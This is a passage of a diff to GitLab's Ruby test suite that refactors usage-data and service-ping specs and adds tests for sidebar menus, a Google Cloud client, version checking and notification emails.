time out' do - allow_any_instance_of(ActiveRecord::Relation) - .to receive(:find_in_batches).and_raise(ActiveRecord::StatementInvalid.new('')) - - expect { described_class.jira_usage }.not_to raise_error - end end describe '.system_usage_data_monthly' do @@ -873,37 +837,12 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do subject { described_class.license_usage_data } it 'gathers license data' do + expect(subject[:uuid]).to eq(Gitlab::CurrentSettings.uuid) expect(subject[:version]).to eq(Gitlab::VERSION) expect(subject[:installation_type]).to eq('gitlab-development-kit') + expect(subject[:active_user_count]).to eq(User.active.size) expect(subject[:recorded_at]).to be_a(Time) end - - context 'with usage_data_instrumentation feature flag' do - context 'when enabled' do - it 'merges uuid and hostname data from instrumentation classes' do - stub_feature_flags(usage_data_instrumentation: true) - - expect(subject[:uuid]).to eq(Gitlab::Utils::UsageData::INSTRUMENTATION_CLASS_FALLBACK) - expect(subject[:hostname]).to eq(Gitlab::Utils::UsageData::INSTRUMENTATION_CLASS_FALLBACK) - expect(subject[:active_user_count]).to eq(Gitlab::Utils::UsageData::INSTRUMENTATION_CLASS_FALLBACK) - - uncached_data = described_class.data - expect(uncached_data[:uuid]).to eq(Gitlab::CurrentSettings.uuid) - expect(uncached_data[:hostname]).to eq(Gitlab.config.gitlab.host) - expect(uncached_data[:active_user_count]).to eq(User.active.size) - end - end - - context 'when disabled' do - it 'does not merge uuid and hostname data from instrumentation classes' do - stub_feature_flags(usage_data_instrumentation: false) - - expect(subject[:uuid]).to eq(Gitlab::CurrentSettings.uuid) - expect(subject[:hostname]).to eq(Gitlab.config.gitlab.host) - expect(subject[:active_user_count]).to eq(User.active.size) - end - end - end end context 'when not relying on database records' do @@ -1139,6 +1078,7 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do describe ".system_usage_data_settings" do let(:prometheus_client) { double(Gitlab::PrometheusClient) } + let(:snowplow_gitlab_host?) { Gitlab::CurrentSettings.snowplow_collector_hostname == 'snowplow.trx.gitlab.net' } before do allow(described_class).to receive(:operating_system).and_return('ubuntu-20.04') @@ -1166,51 +1106,34 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do expect(subject[:settings][:gitaly_apdex]).to be_within(0.001).of(0.95) end - context 'with usage_data_instrumentation feature flag' do - context 'when enabled' do - before do - stub_feature_flags(usage_data_instrumentation: true) - end - - it 'reports collected data categories' do - expected_value = %w[standard subscription operational optional] + it 'reports collected data categories' do + expected_value = %w[standard subscription operational optional] - allow_next_instance_of(ServicePing::PermitDataCategoriesService) do |instance| - expect(instance).to receive(:execute).and_return(expected_value) - end - - expect(described_class.data[:settings][:collected_data_categories]).to eq(expected_value) - end - - it 'gathers service_ping_features_enabled' do - expect(described_class.data[:settings][:service_ping_features_enabled]).to eq(Gitlab::CurrentSettings.usage_ping_features_enabled) - end + allow_next_instance_of(ServicePing::PermitDataCategoriesService) do |instance| + expect(instance).to receive(:execute).and_return(expected_value) end - context 'when disabled' do - before do - stub_feature_flags(usage_data_instrumentation: false) - end - - it 'reports collected data categories' do - expected_value = %w[standard subscription operational optional] - - allow_next_instance_of(ServicePing::PermitDataCategoriesService) do |instance| - expect(instance).to receive(:execute).and_return(expected_value) - end - - expect(subject[:settings][:collected_data_categories]).to eq(expected_value) - end + expect(subject[:settings][:collected_data_categories]).to eq(expected_value) + end - it 'gathers service_ping_features_enabled' do - expect(subject[:settings][:service_ping_features_enabled]).to eq(Gitlab::CurrentSettings.usage_ping_features_enabled) - end - end + it 'gathers service_ping_features_enabled' do + expect(subject[:settings][:service_ping_features_enabled]).to eq(Gitlab::CurrentSettings.usage_ping_features_enabled) end it 'gathers user_cap_feature_enabled' do expect(subject[:settings][:user_cap_feature_enabled]).to eq(Gitlab::CurrentSettings.new_user_signups_cap) end + + context 'snowplow stats' do + before do + stub_feature_flags(usage_data_instrumentation: false) + end + + it 'gathers snowplow stats' do + expect(subject[:settings][:snowplow_enabled]).to eq(Gitlab::CurrentSettings.snowplow_enabled?) + expect(subject[:settings][:snowplow_configured_to_gitlab_collector]).to eq(snowplow_gitlab_host?) + end + end end end @@ -1332,6 +1255,9 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do 'i_analytics_cohorts' => 123, 'i_analytics_dev_ops_score' => 123, 'i_analytics_instance_statistics' => 123, + 'p_analytics_ci_cd_deployment_frequency' => 123, + 'p_analytics_ci_cd_lead_time' => 123, + 'p_analytics_ci_cd_pipelines' => 123, 'p_analytics_merge_request' => 123, 'i_analytics_dev_ops_adoption' => 123, 'users_viewing_analytics_group_devops_adoption' => 123, @@ -1402,33 +1328,21 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do let(:categories) { ::Gitlab::UsageDataCounters::HLLRedisCounter.categories } - context 'with redis_hll_tracking feature enabled' do - it 'has all known_events' do - stub_feature_flags(redis_hll_tracking: true) - - expect(subject).to have_key(:redis_hll_counters) + it 'has all known_events' do + expect(subject).to have_key(:redis_hll_counters) - expect(subject[:redis_hll_counters].keys).to match_array(categories) + expect(subject[:redis_hll_counters].keys).to match_array(categories) - categories.each do |category| - keys = ::Gitlab::UsageDataCounters::HLLRedisCounter.events_for_category(category) + categories.each do |category| + keys = ::Gitlab::UsageDataCounters::HLLRedisCounter.events_for_category(category) - metrics = keys.map { |key| "#{key}_weekly" } + keys.map { |key| "#{key}_monthly" } + metrics = keys.map { |key| "#{key}_weekly" } + keys.map { |key| "#{key}_monthly" } - if ::Gitlab::UsageDataCounters::HLLRedisCounter::CATEGORIES_FOR_TOTALS.include?(category) - metrics.append("#{category}_total_unique_counts_weekly", "#{category}_total_unique_counts_monthly") - end - - expect(subject[:redis_hll_counters][category].keys).to match_array(metrics) + if ::Gitlab::UsageDataCounters::HLLRedisCounter::CATEGORIES_FOR_TOTALS.include?(category) + metrics.append("#{category}_total_unique_counts_weekly", "#{category}_total_unique_counts_monthly") end - end - end - context 'with redis_hll_tracking disabled' do - it 'does not have redis_hll_tracking key' do - stub_feature_flags(redis_hll_tracking: false) - - expect(subject).not_to have_key(:redis_hll_counters) + expect(subject[:redis_hll_counters][category].keys).to match_array(metrics) end end end @@ -1468,46 +1382,58 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do context 'when queries time out' do before do - allow_any_instance_of(ActiveRecord::Relation) - .to receive(:count).and_raise(ActiveRecord::StatementInvalid.new('')) + allow_any_instance_of(ActiveRecord::Relation).to receive(:count).and_raise(ActiveRecord::StatementInvalid) + allow(Gitlab::ErrorTracking).to receive(:should_raise_for_dev?).and_return(should_raise_for_dev) end - it 'returns -1 for email campaign data' do - expected_data = { - "in_product_marketing_email_create_0_sent" => -1, - "in_product_marketing_email_create_0_cta_clicked" => -1, - "in_product_marketing_email_create_1_sent" => -1, - "in_product_marketing_email_create_1_cta_clicked" => -1, - "in_product_marketing_email_create_2_sent" => -1, - "in_product_marketing_email_create_2_cta_clicked" => -1, - "in_product_marketing_email_team_short_0_sent" => -1, - "in_product_marketing_email_team_short_0_cta_clicked" => -1, - "in_product_marketing_email_trial_short_0_sent" => -1, - "in_product_marketing_email_trial_short_0_cta_clicked" => -1, - "in_product_marketing_email_admin_verify_0_sent" => -1, - "in_product_marketing_email_admin_verify_0_cta_clicked" => -1, - "in_product_marketing_email_verify_0_sent" => -1, - "in_product_marketing_email_verify_0_cta_clicked" => -1, - "in_product_marketing_email_verify_1_sent" => -1, - "in_product_marketing_email_verify_1_cta_clicked" => -1, - "in_product_marketing_email_verify_2_sent" => -1, - "in_product_marketing_email_verify_2_cta_clicked" => -1, - "in_product_marketing_email_trial_0_sent" => -1, - "in_product_marketing_email_trial_0_cta_clicked" => -1, - "in_product_marketing_email_trial_1_sent" => -1, - "in_product_marketing_email_trial_1_cta_clicked" => -1, - "in_product_marketing_email_trial_2_sent" => -1, - "in_product_marketing_email_trial_2_cta_clicked" => -1, - "in_product_marketing_email_team_0_sent" => -1, - "in_product_marketing_email_team_0_cta_clicked" => -1, - "in_product_marketing_email_team_1_sent" => -1, - "in_product_marketing_email_team_1_cta_clicked" => -1, - "in_product_marketing_email_team_2_sent" => -1, - "in_product_marketing_email_team_2_cta_clicked" => -1, - "in_product_marketing_email_experience_0_sent" => -1 - } + context 'with should_raise_for_dev? true' do + let(:should_raise_for_dev) { true } - expect(subject).to eq(expected_data) + it 'raises an error' do + expect { subject }.to raise_error(ActiveRecord::StatementInvalid) + end + end + + context 'with should_raise_for_dev? false' do + let(:should_raise_for_dev) { false } + + it 'returns -1 for email campaign data' do + expected_data = { + "in_product_marketing_email_create_0_sent" => -1, + "in_product_marketing_email_create_0_cta_clicked" => -1, + "in_product_marketing_email_create_1_sent" => -1, + "in_product_marketing_email_create_1_cta_clicked" => -1, + "in_product_marketing_email_create_2_sent" => -1, + "in_product_marketing_email_create_2_cta_clicked" => -1, + "in_product_marketing_email_team_short_0_sent" => -1, + "in_product_marketing_email_team_short_0_cta_clicked" => -1, + "in_product_marketing_email_trial_short_0_sent" => -1, + "in_product_marketing_email_trial_short_0_cta_clicked" => -1, + "in_product_marketing_email_admin_verify_0_sent" => -1, + "in_product_marketing_email_admin_verify_0_cta_clicked" => -1, + "in_product_marketing_email_verify_0_sent" => -1, + "in_product_marketing_email_verify_0_cta_clicked" => -1, + "in_product_marketing_email_verify_1_sent" => -1, + "in_product_marketing_email_verify_1_cta_clicked" => -1, + "in_product_marketing_email_verify_2_sent" => -1, + "in_product_marketing_email_verify_2_cta_clicked" => -1, + "in_product_marketing_email_trial_0_sent" => -1, + "in_product_marketing_email_trial_0_cta_clicked" => -1, + "in_product_marketing_email_trial_1_sent" => -1, + "in_product_marketing_email_trial_1_cta_clicked" => -1, + "in_product_marketing_email_trial_2_sent" => -1, + "in_product_marketing_email_trial_2_cta_clicked" => -1, + "in_product_marketing_email_team_0_sent" => -1, + "in_product_marketing_email_team_0_cta_clicked" => -1, + "in_product_marketing_email_team_1_sent" => -1, + "in_product_marketing_email_team_1_cta_clicked" => -1, + "in_product_marketing_email_team_2_sent" => -1, + "in_product_marketing_email_team_2_cta_clicked" => -1, + "in_product_marketing_email_experience_0_sent" => -1 + } + + expect(subject).to eq(expected_data) + end end end diff --git a/spec/lib/gitlab/utils/usage_data_spec.rb b/spec/lib/gitlab/utils/usage_data_spec.rb index e721b28ac29..325ace6fbbf 100644 --- a/spec/lib/gitlab/utils/usage_data_spec.rb +++ b/spec/lib/gitlab/utils/usage_data_spec.rb @@ -5,32 +5,38 @@ require 'spec_helper' RSpec.describe Gitlab::Utils::UsageData do include Database::DatabaseHelpers - describe '#add_metric' do - let(:metric) { 'UuidMetric'} + shared_examples 'failing hardening method' do + before do + allow(Gitlab::ErrorTracking).to receive(:should_raise_for_dev?).and_return(should_raise_for_dev) + stub_const("Gitlab::Utils::UsageData::FALLBACK", fallback) + allow(failing_class).to receive(failing_method).and_raise(ActiveRecord::StatementInvalid) + end - context 'with usage_data_instrumentation feature flag' do - context 'when enabled' do - before do - stub_feature_flags(usage_data_instrumentation: true) - end + context 'with should_raise_for_dev? false' do + let(:should_raise_for_dev) { false } - it 'returns -100 value to be overriden' do - expect(described_class.add_metric(metric)).to eq(-100) - end + it 'returns the fallback' do + expect(subject).to eq(fallback) end + end - context 'when disabled' do - before do - stub_feature_flags(usage_data_instrumentation: false) - end + context 'with should_raise_for_dev? true' do + let(:should_raise_for_dev) { true } - it 'computes the metric value for given metric' do - expect(described_class.add_metric(metric)).to eq(Gitlab::CurrentSettings.uuid) - end + it 'raises an error' do + expect { subject }.to raise_error(ActiveRecord::StatementInvalid) end end end + describe '#add_metric' do + let(:metric) { 'UuidMetric'} + + it 'computes the metric value for given metric' do + expect(described_class.add_metric(metric)).to eq(Gitlab::CurrentSettings.uuid) + end + end + describe '#count' do let(:relation) { double(:relation) } @@ -40,11 +46,14 @@ RSpec.describe Gitlab::Utils::UsageData do expect(described_class.count(relation, batch: false)).to eq(1) end - it 'returns the fallback value when counting fails' do - stub_const("Gitlab::Utils::UsageData::FALLBACK", 15) - allow(relation).to receive(:count).and_raise(ActiveRecord::StatementInvalid.new('')) + context 'when counting fails' do + subject { described_class.count(relation, batch: false) } - expect(described_class.count(relation, batch: false)).to eq(15) + let(:fallback) { 15 } + let(:failing_class) { relation } + let(:failing_method) { :count } + + it_behaves_like 'failing hardening method' end end @@ -57,11 +66,14 @@ RSpec.describe Gitlab::Utils::UsageData do expect(described_class.distinct_count(relation, batch: false)).to eq(1) end - it 'returns the fallback value when counting fails' do - stub_const("Gitlab::Utils::UsageData::FALLBACK", 15) - allow(relation).to receive(:distinct_count_by).and_raise(ActiveRecord::StatementInvalid.new('')) + context 'when counting fails' do + subject { described_class.distinct_count(relation, batch: false) } + + let(:fallback) { 15 } + let(:failing_class) { relation } + let(:failing_method) { :distinct_count_by } - expect(described_class.distinct_count(relation, batch: false)).to eq(15) + it_behaves_like 'failing hardening method' end end @@ -106,7 +118,7 @@ RSpec.describe Gitlab::Utils::UsageData do # build_needs set: ['1', '2', '3', '4', '5'] # ci_build set ['a', 'b'] # with them, current implementation is expected to consistently report - # 5.217656147118495 and 2.0809220082170614 values + # the same static values # This test suite is expected to assure, that HyperLogLog implementation # behaves consistently between changes made to other parts of codebase. # In case of fine tuning or changes to HyperLogLog algorithm implementation @@ -118,8 +130,8 @@ RSpec.describe Gitlab::Utils::UsageData do let(:model) { Ci::BuildNeed } let(:column) { :name } - let(:build_needs_estimated_cardinality) { 5.217656147118495 } - let(:ci_builds_estimated_cardinality) { 2.0809220082170614 } + let(:build_needs_estimated_cardinality) { 5.024574181542231 } + let(:ci_builds_estimated_cardinality) { 2.003916452421793 } before do allow(model.connection).to receive(:transaction_open?).and_return(false) @@ -173,14 +185,24 @@ RSpec.describe Gitlab::Utils::UsageData do stub_const("Gitlab::Utils::UsageData::DISTRIBUTED_HLL_FALLBACK", 4) end - it 'returns fallback if counter raises WRONG_CONFIGURATION_ERROR' do - expect(described_class.estimate_batch_distinct_count(relation, 'id', start: 1, finish: 0)).to eq 3 + context 'when counter raises WRONG_CONFIGURATION_ERROR' do + subject { described_class.estimate_batch_distinct_count(relation, 'id', start: 1, finish: 0) } + + let(:fallback) { 3 } + let(:failing_class) { Gitlab::Database::PostgresHll::BatchDistinctCounter } + let(:failing_method) { :new } + + it_behaves_like 'failing hardening method' end - it 'returns default fallback value when counting fails due to database error' do - allow(Gitlab::Database::PostgresHll::BatchDistinctCounter).to receive(:new).and_raise(ActiveRecord::StatementInvalid.new('')) + context 'when counting fails due to database error' do + subject { described_class.estimate_batch_distinct_count(relation) } + + let(:fallback) { 3 } + let(:failing_class) { Gitlab::Database::PostgresHll::BatchDistinctCounter } + let(:failing_method) { :new } - expect(described_class.estimate_batch_distinct_count(relation)).to eq(3) + it_behaves_like 'failing hardening method' end it 'logs error and returns DISTRIBUTED_HLL_FALLBACK value when counting raises any error', :aggregate_failures do @@ -205,13 +227,14 @@ RSpec.describe Gitlab::Utils::UsageData do expect(described_class.sum(relation, :column, batch_size: 100, start: 2, finish: 3)).to eq(1) end - it 'returns the fallback value when counting fails' do - stub_const("Gitlab::Utils::UsageData::FALLBACK", 15) - allow(Gitlab::Database::BatchCount) - .to receive(:batch_sum) - .and_raise(ActiveRecord::StatementInvalid.new('')) + context 'when counting fails' do + subject { described_class.sum(relation, :column) } - expect(described_class.sum(relation, :column)).to eq(15) + let(:fallback) { 15 } + let(:failing_class) { Gitlab::Database::BatchCount } + let(:failing_method) { :batch_sum } + + it_behaves_like 'failing hardening method' end end @@ -291,23 +314,45 @@ RSpec.describe Gitlab::Utils::UsageData do expect(histogram).to eq('2' => 1) end - it 'returns fallback and logs canceled queries' do - create(:alert_management_http_integration, :active, project: project1) + context 'when query timeout' do + subject do + with_statement_timeout(0.001) do + relation = AlertManagement::HttpIntegration.select('pg_sleep(0.002)') + described_class.histogram(relation, column, buckets: 1..100) + end + end - expect(Gitlab::AppJsonLogger).to receive(:error).with( - event: 'histogram', - relation: relation.table_name, - operation: 'histogram', - operation_args: [column, 1, 100, 99], - query: kind_of(String), - message: /PG::QueryCanceled/ - ) + before do + allow(Gitlab::ErrorTracking).to receive(:should_raise_for_dev?).and_return(should_raise_for_dev) + create(:alert_management_http_integration, :active, project: project1) + end - with_statement_timeout(0.001) do - relation = AlertManagement::HttpIntegration.select('pg_sleep(0.002)') - histogram = described_class.histogram(relation, column, buckets: 1..100) + context 'with should_raise_for_dev? false' do + let(:should_raise_for_dev) { false } + + it 'logs canceled queries' do + expect(Gitlab::AppJsonLogger).to receive(:error).with( + event: 'histogram', + relation: relation.table_name, + operation: 'histogram', + operation_args: [column, 1, 100, 99], + query: kind_of(String), + message: /PG::QueryCanceled/ + ) + subject + end - expect(histogram).to eq(fallback) + it 'returns fallback' do + expect(subject).to eq(fallback) + end + end + + context 'with should_raise_for_dev? true' do + let(:should_raise_for_dev) { true } + + it 'raises error' do + expect { subject }.to raise_error(ActiveRecord::QueryCanceled) + end end end end diff --git a/spec/lib/gitlab/utils_spec.rb b/spec/lib/gitlab/utils_spec.rb index f1601294c07..d756ec5ef83 100644 --- a/spec/lib/gitlab/utils_spec.rb +++ b/spec/lib/gitlab/utils_spec.rb @@ -249,10 +249,16 @@ RSpec.describe Gitlab::Utils do end describe '.which' do - it 'finds the full path to an executable binary' do - expect(File).to receive(:executable?).with('/bin/sh').and_return(true) + before do + stub_env('PATH', '/sbin:/usr/bin:/home/joe/bin') + end + + it 'finds the full path to an executable binary in order of appearance' do + expect(File).to receive(:executable?).with('/sbin/tool').ordered.and_return(false) + expect(File).to receive(:executable?).with('/usr/bin/tool').ordered.and_return(true) + expect(File).not_to receive(:executable?).with('/home/joe/bin/tool') - expect(which('sh', 'PATH' => '/bin')).to eq('/bin/sh') + expect(which('tool')).to eq('/usr/bin/tool') end end diff --git a/spec/lib/google_api/cloud_platform/client_spec.rb b/spec/lib/google_api/cloud_platform/client_spec.rb index 3dd8f7c413e..3284c9cd0d1 100644 --- a/spec/lib/google_api/cloud_platform/client_spec.rb +++ b/spec/lib/google_api/cloud_platform/client_spec.rb @@ -209,4 +209,47 @@ RSpec.describe GoogleApi::CloudPlatform::Client do expect(subject.header).to eq({ 'User-Agent': 'GitLab/10.3 (GPN:GitLab;)' }) end end + + describe '#list_projects' do + subject { client.list_projects } + + let(:list_of_projects) { [{}, {}, {}] } + let(:next_page_token) { nil } + let(:operation) { double('projects': list_of_projects, 'next_page_token': next_page_token) } + + it 'calls Google Api CloudResourceManagerService#list_projects' do + expect_any_instance_of(Google::Apis::CloudresourcemanagerV1::CloudResourceManagerService) + .to receive(:list_projects) + .and_return(operation) + is_expected.to eq(list_of_projects) + end + end + + describe '#create_service_account' do + subject { client.create_service_account(spy, spy, spy) } + + let(:operation) { double('Service Account') } + + it 'calls Google Api IamService#create_service_account' do + expect_any_instance_of(Google::Apis::IamV1::IamService) + .to receive(:create_service_account) + .with(any_args) + .and_return(operation) + is_expected.to eq(operation) + end + end + + describe '#create_service_account_key' do + subject { client.create_service_account_key(spy, spy) } + + let(:operation) { double('Service Account Key') } + + it 'class Google Api IamService#create_service_account_key' do + expect_any_instance_of(Google::Apis::IamV1::IamService) + .to receive(:create_service_account_key) + .with(any_args) + .and_return(operation) + is_expected.to eq(operation) + end + end end diff --git a/spec/lib/sidebars/concerns/link_with_html_options_spec.rb b/spec/lib/sidebars/concerns/link_with_html_options_spec.rb new file mode 100644 index 00000000000..1e890bffad1 --- /dev/null +++ b/spec/lib/sidebars/concerns/link_with_html_options_spec.rb @@ -0,0 +1,39 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Sidebars::Concerns::LinkWithHtmlOptions do + let(:options) { {} } + + subject { Class.new { include Sidebars::Concerns::LinkWithHtmlOptions }.new } + + before do + allow(subject).to receive(:container_html_options).and_return(options) + end + + describe '#link_html_options' do + context 'with existing classes' do + let(:options) do + { + class: '_class1_ _class2_', + aria: { label: '_label_' } + } + end + + it 'includes class and default aria-label attribute' do + result = { + class: '_class1_ _class2_ gl-link', + aria: { label: '_label_' } + } + + expect(subject.link_html_options).to eq(result) + end + end + + context 'without existing classes' do + it 'includes gl-link class' do + expect(subject.link_html_options).to eq(class: 'gl-link') + end + end + end +end diff --git a/spec/lib/sidebars/groups/menus/packages_registries_menu_spec.rb b/spec/lib/sidebars/groups/menus/packages_registries_menu_spec.rb index e954d7a44ba..bc1fa3e88ff 100644 --- a/spec/lib/sidebars/groups/menus/packages_registries_menu_spec.rb +++ b/spec/lib/sidebars/groups/menus/packages_registries_menu_spec.rb @@ -4,7 +4,7 @@ require 'spec_helper' RSpec.describe Sidebars::Groups::Menus::PackagesRegistriesMenu do let_it_be(:owner) { create(:user) } - let_it_be(:group) do + let_it_be_with_reload(:group) do build(:group, :private).tap do |g| g.add_owner(owner) end @@ -70,6 +70,18 @@ RSpec.describe Sidebars::Groups::Menus::PackagesRegistriesMenu do describe 'Menu items' do subject { find_menu(menu, item_id) } + shared_examples 'the menu entry is available' do + it 'the menu item is added to list of menu items' do + is_expected.not_to be_nil + end + end + + shared_examples 'the menu entry is not available' do + it 'the menu item is not added to list of menu items' do + is_expected.to be_nil + end + end + describe 'Packages Registry' do let(:item_id) { :packages_registry } @@ -81,17 +93,13 @@ RSpec.describe Sidebars::Groups::Menus::PackagesRegistriesMenu do context 'when config package setting is disabled' do let(:packages_enabled) { false } - it 'the menu item is not added to list of menu items' do - is_expected.to be_nil - end + it_behaves_like 'the menu entry is not available' end context 'when config package setting is enabled' do let(:packages_enabled) { true } - it 'the menu item is added to list of menu items' do - is_expected.not_to be_nil - end + it_behaves_like 'the menu entry is available' end end end @@ -107,24 +115,18 @@ RSpec.describe Sidebars::Groups::Menus::PackagesRegistriesMenu do context 'when config registry setting is disabled' do let(:container_enabled) { false } - it 'the menu item is not added to list of menu items' do - is_expected.to be_nil - end + it_behaves_like 'the menu entry is not available' end context 'when config registry setting is enabled' do let(:container_enabled) { true } - it 'the menu item is added to list of menu items' do - is_expected.not_to be_nil - end + it_behaves_like 'the menu entry is available' context 'when user cannot read container images' do let(:user) { nil } - it 'the menu item is not added to list of menu items' do - is_expected.to be_nil - end + it_behaves_like 'the menu entry is not available' end end end @@ -141,17 +143,28 @@ RSpec.describe Sidebars::Groups::Menus::PackagesRegistriesMenu do context 'when config dependency_proxy is enabled' do let(:dependency_enabled) { true } - it 'the menu item is added to list of menu items' do - is_expected.not_to be_nil + it_behaves_like 'the menu entry is available' + + context 'when the group settings exist' do + let_it_be(:dependency_proxy_group_setting) { create(:dependency_proxy_group_setting, group: group) } + + it_behaves_like 'the menu entry is available' + + context 'when the proxy is disabled at the group level' do + before do + dependency_proxy_group_setting.enabled = false + dependency_proxy_group_setting.save! + end + + it_behaves_like 'the menu entry is not available' + end end end context 'when config dependency_proxy is not enabled' do let(:dependency_enabled) { false } - it 'the menu item is not added to list of menu items' do - is_expected.to be_nil - end + it_behaves_like 'the menu entry is not available' end end @@ -159,9 +172,7 @@ RSpec.describe Sidebars::Groups::Menus::PackagesRegistriesMenu do let(:user) { nil } let(:dependency_enabled) { true } - it 'the menu item is not added to list of menu items' do - is_expected.to be_nil - end + it_behaves_like 'the menu entry is not available' end end end diff --git a/spec/lib/sidebars/menu_spec.rb b/spec/lib/sidebars/menu_spec.rb index eb6a68f1afd..bdd9f22d5a0 100644 --- a/spec/lib/sidebars/menu_spec.rb +++ b/spec/lib/sidebars/menu_spec.rb @@ -153,6 +153,25 @@ RSpec.describe Sidebars::Menu do end end + describe '#remove_element' do + let(:item1) { Sidebars::MenuItem.new(title: 'foo1', link: 'foo1', active_routes: {}, item_id: :foo1) } + let(:item2) { Sidebars::MenuItem.new(title: 'foo2', link: 'foo2', active_routes: {}, item_id: :foo2) } + let(:item3) { Sidebars::MenuItem.new(title: 'foo3', link: 'foo3', active_routes: {}, item_id: :foo3) } + let(:list) { [item1, item2, item3] } + + it 'removes specific element' do + menu.remove_element(list, :foo2) + + expect(list).to eq [item1, item3] + end + + it 'does not remove nil elements' do + menu.remove_element(list, nil) + + expect(list).to eq [item1, item2, item3] + end + end + describe '#container_html_options' do before do allow(menu).to receive(:title).and_return('Foo Menu') diff --git a/spec/lib/sidebars/projects/menus/shimo_menu_spec.rb b/spec/lib/sidebars/projects/menus/shimo_menu_spec.rb new file mode 100644 index 00000000000..534267a329e --- /dev/null +++ b/spec/lib/sidebars/projects/menus/shimo_menu_spec.rb @@ -0,0 +1,44 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Sidebars::Projects::Menus::ShimoMenu do + let_it_be_with_reload(:project) { create(:project) } + + let(:context) { Sidebars::Projects::Context.new(current_user: project.owner, container: project) } + + subject(:shimo_menu) { described_class.new(context) } + + describe '#render?' do + context 'without a valid Shimo integration' do + it "doesn't render the menu" do + expect(shimo_menu.render?).to be_falsey + end + end + + context 'with a valid Shimo integration' do + let_it_be_with_reload(:shimo_integration) { create(:shimo_integration, project: project) } + + context 'when integration is active' do + it 'renders the menu' do + expect(shimo_menu.render?).to eq true + end + + it 'renders menu link' do + expected_url = Rails.application.routes.url_helpers.project_integrations_shimo_path(project) + expect(shimo_menu.link).to eq expected_url + end + end + + context 'when integration is inactive' do + before do + shimo_integration.update!(active: false) + end + + it "doesn't render the menu" do + expect(shimo_menu.render?).to eq false + end + end + end + end +end diff --git a/spec/lib/version_check_spec.rb b/spec/lib/version_check_spec.rb index 23c381e241e..d7a772a3f7e 100644 --- a/spec/lib/version_check_spec.rb +++ b/spec/lib/version_check_spec.rb @@ -3,9 +3,67 @@ require 'spec_helper' RSpec.describe VersionCheck do + describe '.image_url' do + it 'returns the correct URL' do + expect(described_class.image_url).to match(%r{\A#{Regexp.escape(described_class.host)}/check\.svg\?gitlab_info=\w+}) + end + end + describe '.url' do it 'returns the correct URL' do - expect(described_class.url).to match(%r{\A#{Regexp.escape(described_class.host)}/check\.svg\?gitlab_info=\w+}) + expect(described_class.url).to match(%r{\A#{Regexp.escape(described_class.host)}/check\.json\?gitlab_info=\w+}) + end + end + + describe '#calculate_reactive_cache' do + context 'response code is 200' do + before do + stub_request(:get, described_class.url).to_return(status: 200, body: '{ "status": "success" }', headers: {}) + end + + it 'returns the response object' do + expect(described_class.new.calculate_reactive_cache).to eq("{ \"status\": \"success\" }") + end + end + + context 'response code is not 200' do + before do + stub_request(:get, described_class.url).to_return(status: 500, body: nil, headers: {}) + end + + it 'returns nil' do + expect(described_class.new.calculate_reactive_cache).to be(nil) + end + end + end + + describe '#response' do + context 'cache returns value' do + let(:response) { { "severity" => "success" }.to_json } + + before do + allow_next_instance_of(described_class) do |instance| + allow(instance).to receive(:with_reactive_cache).and_return(response) + end + end + + it 'returns the response object' do + expect(described_class.new.response).to be(response) + end + end + + context 'cache returns nil' do + let(:response) { nil } + + before do + allow_next_instance_of(described_class) do |instance| + allow(instance).to receive(:with_reactive_cache).and_return(response) + end + end + + it 'returns nil' do + expect(described_class.new.response).to be(nil) + end end end end diff --git a/spec/mailers/emails/in_product_marketing_spec.rb b/spec/mailers/emails/in_product_marketing_spec.rb index 3b92b049e42..720e6f101a8 100644 --- a/spec/mailers/emails/in_product_marketing_spec.rb +++ b/spec/mailers/emails/in_product_marketing_spec.rb @@ -5,29 +5,11 @@ require 'email_spec' RSpec.describe Emails::InProductMarketing do include EmailSpec::Matchers + include Gitlab::Routing.url_helpers let_it_be(:user) { create(:user) } - let_it_be(:group) { create(:group) } - - let!(:onboarding_progress) { create(:onboarding_progress, namespace: group) } - - describe '#in_product_marketing_email' do - using RSpec::Parameterized::TableSyntax - - let(:track) { :create } - let(:series) { 0 } - - subject { Notify.in_product_marketing_email(user.id, group.id, track, series) } - - include_context 'gitlab email notification' - - it 'sends to the right user with a link to unsubscribe' do - aggregate_failures do - expect(subject).to deliver_to(user.notification_email_or_default) - expect(subject).to have_body_text(profile_notifications_url) - end - end + shared_examples 'has custom headers when on gitlab.com' do context 'when on gitlab.com' do before do allow(Gitlab).to receive(:com?).and_return(true) @@ -45,6 +27,30 @@ RSpec.describe Emails::InProductMarketing do end end end + end + + describe '#in_product_marketing_email' do + let_it_be(:group) { create(:group) } + + let!(:onboarding_progress) { create(:onboarding_progress, namespace: group) } + + using RSpec::Parameterized::TableSyntax + + let(:track) { :create } + let(:series) { 0 } + + subject { Notify.in_product_marketing_email(user.id, group.id, track, series) } + + include_context 'gitlab email notification' + + it_behaves_like 'has custom headers when on gitlab.com' + + it 'sends to the right user with a link to unsubscribe' do + aggregate_failures do + expect(subject).to deliver_to(user.notification_email_or_default) + expect(subject).to have_body_text(profile_notifications_url) + end + end where(:track, :series) do :create | 0 @@ -68,7 +74,6 @@ RSpec.describe Emails::InProductMarketing do with_them do before do - stub_experiments(invite_members_for_task: :candidate) group.add_owner(user) end diff --git a/spec/mailers/notify_spec.rb b/spec/mailers/notify_spec.rb index a5e3350ec2e..44cb18008d2 100644 --- a/spec/mailers/notify_spec.rb +++ b/spec/mailers/notify_spec.rb @@ -613,6 +613,28 @@ RSpec.describe Notify do it 'has References header including the notes and issue of the discussion' do expect(subject.header['References'].message_ids).to include("issue_#{note.noteable.id}@#{host}") end + + context 'with private references accessible to the recipient' do + let_it_be(:private_project) { create(:project, :private) } + let_it_be(:private_issue) { create(:issue, :closed, project: private_project) } + + before_all do + private_project.add_guest(recipient) + + note.update!(note: "#{private_issue.to_reference(full: true)}") + end + + let(:html_part) { subject.body.parts.last.to_s } + + it 'does not redact the reference' do + expect(html_part).to include("data-reference-type=\"issue\"") + expect(html_part).to include("title=\"#{private_issue.title}\"") + end + + it 'renders expanded issue references' do + expect(html_part).to include("#{private_issue.to_reference(full: true)} (closed)") + end + end end end @@ -807,7 +829,7 @@ RSpec.describe Notify do end it_behaves_like 'an email sent from GitLab' - it_behaves_like 'it should not have Gmail Actions links' + it_behaves_like 'it should 